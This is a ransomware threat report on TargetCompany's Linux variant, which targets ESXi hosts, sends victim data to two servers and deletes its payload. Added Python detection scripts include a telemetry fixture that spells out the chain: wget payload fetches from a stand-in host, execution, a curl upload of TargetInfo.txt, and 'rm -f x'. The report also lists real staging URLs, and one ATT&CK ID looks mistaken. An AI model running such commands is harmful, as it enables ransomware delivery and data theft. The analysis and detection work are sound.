Summary
- The TargetCompany ransomware group has released a new Linux variant that uses a custom shell script to deliver and execute its payload, a technique not seen in earlier versions.
- The shell script also sends the victim's data to two separate servers so that the ransomware operators keep a backup copy of the information.
- The Linux variant can determine whether the victim's system is running in a VMware ESXi environment.
- By targeting ESXi servers, the TargetCompany operators aim to cause greater operational disruption and increase the likelihood of a ransom payment.
- The TargetCompany affiliate behind the sample points to a broader campaign against large IT infrastructures.
First seen in June 2021, the TargetCompany ransomware is tracked by Trend Micro as "Water Gatpanapun" and operates a leak site called "Mallox". Observations indicate that the group has been most active in Taiwan, India, Thailand, and South Korea this year.
Since it was identified, TargetCompany has kept refining its methods to bypass the security controls organizations put in place; examples include using a PowerShell script to bypass the Antimalware Scan Interface (AMSI) and abusing fully undetectable (FUD) obfuscator packers.
Recently, our threat hunting team discovered a new TargetCompany ransomware variant built for Linux. This variant uses a shell script to deliver and execute the payload (see Figure 1).

This technique had not been observed in previous TargetCompany variants, which suggests that the group continues to evolve and adopt more sophisticated techniques in its attacks. The new Linux variant also fits the broader trend of ransomware groups extending their attacks to critical Linux environments, widening the pool of potential victims.
TargetCompany's Linux variant
The new variant first checks whether it is running with administrative privileges (Figure 2); if not, it stops its malicious routine. This implies that a compromised or misconfigured device was used to obtain administrative access before the ransomware payload was executed.

Exfiltrating sensitive victim data
Once running, it drops a text file named TargetInfo.txt containing victim information, as shown in Figure 3. The contents of TargetInfo.txt are sent to a command-and-control (C&C) server, hxxp://91[BLOCKED], via a file named ap.php (Figure 4). This behavior mirrors that of the ransomware's Windows version.


Targeting ESXi environments
The threat actors behind TargetCompany have extended their targeting to virtualization servers in order to cause more damage and operational disruption. They have added a routine that checks whether the system is running in a VMware ESXi environment, a platform widely used to host critical virtualized workloads in enterprises (Figure 5). Encrypting key ESXi servers could increase the likelihood that a ransom is paid.
The binary runs the "uname" command to determine whether the machine is a VMware ESXi host.

If the system name matches "vmkernel", the machine is running VMware's ESXi hypervisor, and the binary switches to "VM mode..." to encrypt files with the extensions listed in Figure 6.

Data encryption and ransom note deployment


Execution of TargetCompany using a shell script


The custom shell script can also exfiltrate data to a second server. After the ransomware payload has run, the script reads the contents of the dropped text file TargetInfo.txt and sends it to another URL using either "wget" or "curl".

This variant sends victim information to two separate servers. Adding this step to TargetCompany's playbook likely provides redundancy and a fallback in case one server goes offline or is taken down.
Once the ransomware routine finishes, the script deletes the TargetCompany payload with the command "rm -f x".
This technique is common, but it poses real challenges for defenders: investigators and responders are left with little evidence to analyze, which makes it harder to determine the full impact of the attack.
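The behaviour described in the last two sections (a fetcher pulling down the script and payload, the payload dropping TargetInfo.txt, the script pushing that file out with curl or wget, and the payload being removed with "rm -f") leaves a recognizable sequence in process-execution telemetry. The following detection logic is an added example for defenders, not code from Trend Micro or from the sample. The input records are constructed to resemble flattened execve telemetry (timestamp, pid, ppid, command line); the host 203.0.113.10 is a documentation address standing in for the real staging server, and the rule names are the author's own.

```python
"""Correlate process-execution records into findings for the TargetCompany
Linux delivery chain: download, execution of the downloaded file, upload of a
local file (TargetInfo.txt scores highest) and deletion of the downloaded file.
Added example; the telemetry below is constructed, not from a real host."""
import os
import shlex
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample telemetry: (timestamp, pid, ppid, command line).
# The last two rows are benign noise that the rules must not flag.
SAMPLE_EVENTS = [
    ("2023-07-01T10:00:01", 4101, 3990, "wget -q http://203.0.113.10:8168/general/vmeet/upload/temp/x.sh -O x.sh"),
    ("2023-07-01T10:00:02", 4102, 3990, "sh x.sh"),
    ("2023-07-01T10:00:03", 4103, 4102, "wget -q http://203.0.113.10:8168/general/vmeet/upload/temp/x -O x"),
    ("2023-07-01T10:00:04", 4104, 4102, "chmod +x x"),
    ("2023-07-01T10:00:05", 4105, 4102, "./x"),
    ("2023-07-01T10:02:10", 4106, 4102, "curl -s -X POST --data-binary @TargetInfo.txt http://203.0.113.10:8168/general/vmeet/upload/temp/post.php"),
    ("2023-07-01T10:02:11", 4107, 4102, "rm -f x"),
    ("2023-07-01T10:05:00", 4200, 1, "curl -s https://example.org/healthz"),
    ("2023-07-01T10:06:00", 4201, 1, "rm -f /tmp/build.lock"),
]

FETCHERS = ("wget", "curl")
URL_SCHEMES = ("http://", "https://", "ftp://")


@dataclass
class Finding:
    rule: str
    severity: str
    timestamp: str
    pid: int
    cmdline: str


def tokens_of(cmdline):
    """Split a command line like a shell would; fall back to whitespace on bad quoting."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return cmdline.split()


def download_target(tokens):
    """Return the local filename a curl/wget fetch writes, or None if it does not write to disk."""
    if not tokens or os.path.basename(tokens[0]) not in FETCHERS:
        return None
    exe = os.path.basename(tokens[0])
    urls = [t for t in tokens if t.startswith(URL_SCHEMES)]
    for i, tok in enumerate(tokens[1:], 1):
        if exe == "curl" and tok in ("-O", "--remote-name") and urls:
            return os.path.basename(urlparse(urls[0]).path) or None
        if tok in ("-o", "-O", "--output", "--output-document") and i + 1 < len(tokens):
            return os.path.basename(tokens[i + 1])
    if exe == "wget" and urls:  # wget without -O saves under the URL's last path element
        return os.path.basename(urlparse(urls[0]).path) or None
    return None


def upload_target(tokens):
    """Return the local file a curl/wget command sends to a server, or None."""
    if not tokens or os.path.basename(tokens[0]) not in FETCHERS:
        return None
    for i, tok in enumerate(tokens[1:], 1):
        if tok.startswith("--post-file="):
            return os.path.basename(tok.split("=", 1)[1])
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if nxt is None:
            continue
        if tok in ("--post-file", "-T", "--upload-file"):
            return os.path.basename(nxt)
        if tok in ("-d", "--data", "--data-binary", "-F", "--form") and "@" in nxt:
            return os.path.basename(nxt.split("@", 1)[1])
    return None


def exec_target(tokens):
    """Return the script or binary a command runs from a path or via sh/bash, or None."""
    if not tokens:
        return None
    exe = tokens[0]
    if exe.startswith(("./", "/")):
        return os.path.basename(exe)
    if os.path.basename(exe) in ("sh", "bash", "dash") and len(tokens) > 1 and not tokens[1].startswith("-"):
        return os.path.basename(tokens[1])
    return None


def rm_targets(tokens):
    """Return the basenames an rm command removes."""
    if not tokens or os.path.basename(tokens[0]) != "rm":
        return []
    return [os.path.basename(t) for t in tokens[1:] if not t.startswith("-")]


def analyze(events):
    """Walk the events in order, remembering downloaded filenames so that later
    execution and deletion of the same names can be tied back to the fetch."""
    dropped = set()
    findings = []
    for ts, pid, _ppid, cmdline in events:
        toks = tokens_of(cmdline)
        sent = upload_target(toks)
        if sent:
            sev = "high" if sent == "TargetInfo.txt" else "medium"
            findings.append(Finding("local-file-upload", sev, ts, pid, cmdline))
            continue
        fetched = download_target(toks)
        if fetched:
            dropped.add(fetched)
            findings.append(Finding("ingress-tool-transfer", "low", ts, pid, cmdline))
            continue
        ran = exec_target(toks)
        if ran and ran in dropped:
            findings.append(Finding("exec-downloaded-file", "medium", ts, pid, cmdline))
            continue
        if any(gone in dropped for gone in rm_targets(toks)):
            findings.append(Finding("downloaded-file-deleted", "high", ts, pid, cmdline))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.timestamp} pid={f.pid} [{f.severity:6}] {f.rule}: {f.cmdline}")
```

Run on the constructed events, the two curl and rm commands at the end produce no findings, while the chain from the report yields six, two of them high severity (the TargetInfo.txt upload and the deletion of the fetched payload). In production the same functions would be fed from auditd EXECVE records or an EDR process stream rather than the inline list.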
Infrastructure
The IP address used to host the payload and receive victims' system information has not been seen in earlier TargetCompany campaigns. Our research shows that the IP address is hosted by China Mobile Communications, an internet service provider (ISP) in China.
Since the address is hosted by an ISP, the TargetCompany actors likely acquired the IP address to host their malicious payload (Figure 12).

The certificate was newly registered and is valid for only three months, which suggests short-term use. When we accessed the IP address, we were shown a page resembling the Tongda Xinke OA login page (Figure 13).

Affiliate "vampire"
The specific sample shown in Figure 14 is linked to an affiliate called "vampire", based on the data it sends to its C&C server. This points to larger campaigns involving high ransom demands and the targeting of large IT systems. This affiliate may be connected to the one described in a blog post published by Sekoia.

Conclusion
Threat actors continuously improve their attacks, as shown by TargetCompany's new Linux variant, which extends the ransomware's targeting to VMware ESXi environments. Defenders therefore need to stay alert to evolving ransomware variants. Following established security practices reduces the risk of falling victim to ransomware and helps protect the integrity of an organization's data. Organizations can adopt best practices such as:
- Enabling multi-factor authentication (MFA) to prevent attackers from moving laterally within a network.
- Following the 3-2-1 rule when backing up important files: keep three copies in two different file formats, with one copy stored in a separate location.
- Patching and updating systems regularly; keeping operating systems and applications up to date is essential to prevent threat actors from exploiting software vulnerabilities.
Trend Vision One™ hunting query
- `malName:*Linux.TARGETCOMP* AND eventName:MALWARE_DETECTION`
Indicators of compromise (IOCs)
Hashes
| Hash | Detection | Description |
| --- | --- | --- |
| dffa99b9fe6e7d3e19afba38c9f7ec739581f656 | Ransom.Linux.TARGETCOMP.YXEEQT | TargetCompany Linux variant |
| 2b82b463dab61cd3d7765492d7b4a529b4618e57 | Trojan.SH.TARGETCOMP.THEAGBD | Shell script |
| 9779aa8eb4c6f9eb809ebf4646867b0ed38c97e1 | Ransom.Win64.TARGETCOMP.YXECMT | TargetCompany sample associated with affiliate vampire |
| 3642996044cd85381b19f28a9ab6763e2bab653c | Ransom.Win64.TARGETCOMP.YXECFT | TargetCompany sample associated with affiliate vampire |
| 4cdee339e038f5fc32dde8432dc3630afd4df8a2 | Ransom.Win32.TARGETCOMP.SMYXCLAZ | TargetCompany sample associated with affiliate vampire |
| 0f6bea3ff11bb56c2daf4c5f5c5b2f1afd3d5098 | Ransom.Win32.TARGETCOMP.SMYXCLAZ | TargetCompany sample associated with affiliate vampire |
URLs
| URL | Detection | Description |
| --- | --- | --- |
| hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x.sh | 90 – Unverified | Download URL for the shell script |
| hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x | 79 – Disease Vector | Download URL for the ransomware payload |
| hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/post.php | 79 – Disease Vector | Upload URL |
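The indicators above are published defanged (hxxp, [.]) and as SHA-1 values, so a responder has to normalize them before they can be matched against files or proxy logs. The script below is an added example for defenders, not Trend Micro code: it carries the report's hash and URL lists verbatim, restores the URLs to matchable form, hashes files under a directory tree against the list, and checks proxy log lines for the exact URLs or, failing that, for the staging host. The Squid-style access log lines are constructed for the demonstration; the function names are the author's own.

```python
"""Match this report's IOCs against a file tree and proxy logs.
Added example; SHA1_IOCS and URL_IOCS are copied from the report's IOC tables,
the proxy log lines are constructed."""
import hashlib
import os
import re
from urllib.parse import urlparse

SHA1_IOCS = {
    "dffa99b9fe6e7d3e19afba38c9f7ec739581f656": "Ransom.Linux.TARGETCOMP.YXEEQT",
    "2b82b463dab61cd3d7765492d7b4a529b4618e57": "Trojan.SH.TARGETCOMP.THEAGBD",
    "9779aa8eb4c6f9eb809ebf4646867b0ed38c97e1": "Ransom.Win64.TARGETCOMP.YXECMT",
    "3642996044cd85381b19f28a9ab6763e2bab653c": "Ransom.Win64.TARGETCOMP.YXECFT",
    "4cdee339e038f5fc32dde8432dc3630afd4df8a2": "Ransom.Win32.TARGETCOMP.SMYXCLAZ",
    "0f6bea3ff11bb56c2daf4c5f5c5b2f1afd3d5098": "Ransom.Win32.TARGETCOMP.SMYXCLAZ",
}

# Defanged exactly as published; refang() restores them for matching.
URL_IOCS = [
    "hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x.sh",
    "hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x",
    "hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/post.php",
]

# Constructed Squid native-format access log lines. The fourth touches the
# staging host at a path not in the IOC list; the last is benign.
SAMPLE_PROXY_LOG = [
    "1688205601.123    245 10.0.0.15 TCP_MISS/200 1423 GET http://111.10.231.151:8168/general/vmeet/upload/temp/x.sh - HIER_DIRECT/111.10.231.151 text/x-sh",
    "1688205602.456    312 10.0.0.15 TCP_MISS/200 88210 GET http://111.10.231.151:8168/general/vmeet/upload/temp/x - HIER_DIRECT/111.10.231.151 application/octet-stream",
    "1688205730.789     90 10.0.0.15 TCP_MISS/200 312 POST http://111.10.231.151:8168/general/vmeet/upload/temp/post.php - HIER_DIRECT/111.10.231.151 text/html",
    "1688205731.000     60 10.0.0.15 TCP_MISS/404 410 GET http://111.10.231.151:8168/general/login.php - HIER_DIRECT/111.10.231.151 text/html",
    "1688205800.000     40 10.0.0.22 TCP_HIT/200 5120 GET http://example.org/index.html - HIER_NONE/- text/html",
]


def refang(indicator):
    """Convert defanged notation (hxxp, [.], [:]) back into a usable URL."""
    out = re.sub(r"^hxxps?", lambda m: m.group(0).lower().replace("xx", "tt"),
                 indicator, flags=re.IGNORECASE)
    return out.replace("[.]", ".").replace("[:]", ":")


def sha1_hex(data):
    """SHA-1 of an in-memory blob as lowercase hex."""
    return hashlib.sha1(data).hexdigest()


def lookup_sha1(hexdigest):
    """Return the detection name for a SHA-1 in the IOC list, or None."""
    return SHA1_IOCS.get(hexdigest.lower())


def sha1_of_file(path, chunk=1 << 20):
    """Stream a file through SHA-1 so large images and VMDKs do not land in memory."""
    h = hashlib.sha1()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root):
    """Yield (path, detection) for every regular file under root whose SHA-1 is an IOC."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                det = lookup_sha1(sha1_of_file(path))
            except OSError:  # unreadable or vanished file; keep sweeping
                continue
            if det:
                yield path, det


def match_proxy_log(lines, indicators=URL_IOCS):
    """Return (line, matched_indicator, kind) tuples. kind is 'url' for an exact
    IOC URL (longest match wins, so .../x does not shadow .../x.sh) and 'host'
    when only the staging host:port appears, which still merits review because
    one server served every artefact in the report."""
    urls = [refang(u) for u in indicators]
    hosts = {urlparse(u).netloc for u in urls}
    hits = []
    for line in lines:
        url_hit = max((u for u in urls if u in line), key=len, default=None)
        if url_hit:
            hits.append((line, url_hit, "url"))
            continue
        host_hit = next((h for h in hosts if h in line), None)
        if host_hit:
            hits.append((line, host_hit, "host"))
    return hits


if __name__ == "__main__":
    import sys
    for path, det in sweep(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{det}\t{path}")
    for line, ind, kind in match_proxy_log(SAMPLE_PROXY_LOG):
        print(f"[{kind}] {ind}\n    {line}")
```

Invoked with a directory argument, the script hashes every file under it and reports anything on the hash list; the proxy-log part runs over the constructed lines and produces three exact URL matches plus one host-only match for the request to a path the report does not list. Because "rm -f x" removes the payload from disk, the hash sweep will usually come up empty on a host that ran the full chain, which is why the proxy and process telemetry checks matter more than the file scan in this case.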
MITRE ATT&CK tactics and techniques
| Tactic | Technique | ID |
| --- | --- | --- |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 |
| Discovery | System Information Discovery | T1082 |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| Command and Control | Ingress Tool Transfer | T1105 |
| Exfiltration | Exfiltration Over Alternative Protocol | T1408 |
| Exfiltration | Exfiltration Over C2 Channel | T1041 |
| Impact | Data Encrypted for Impact | T1486 |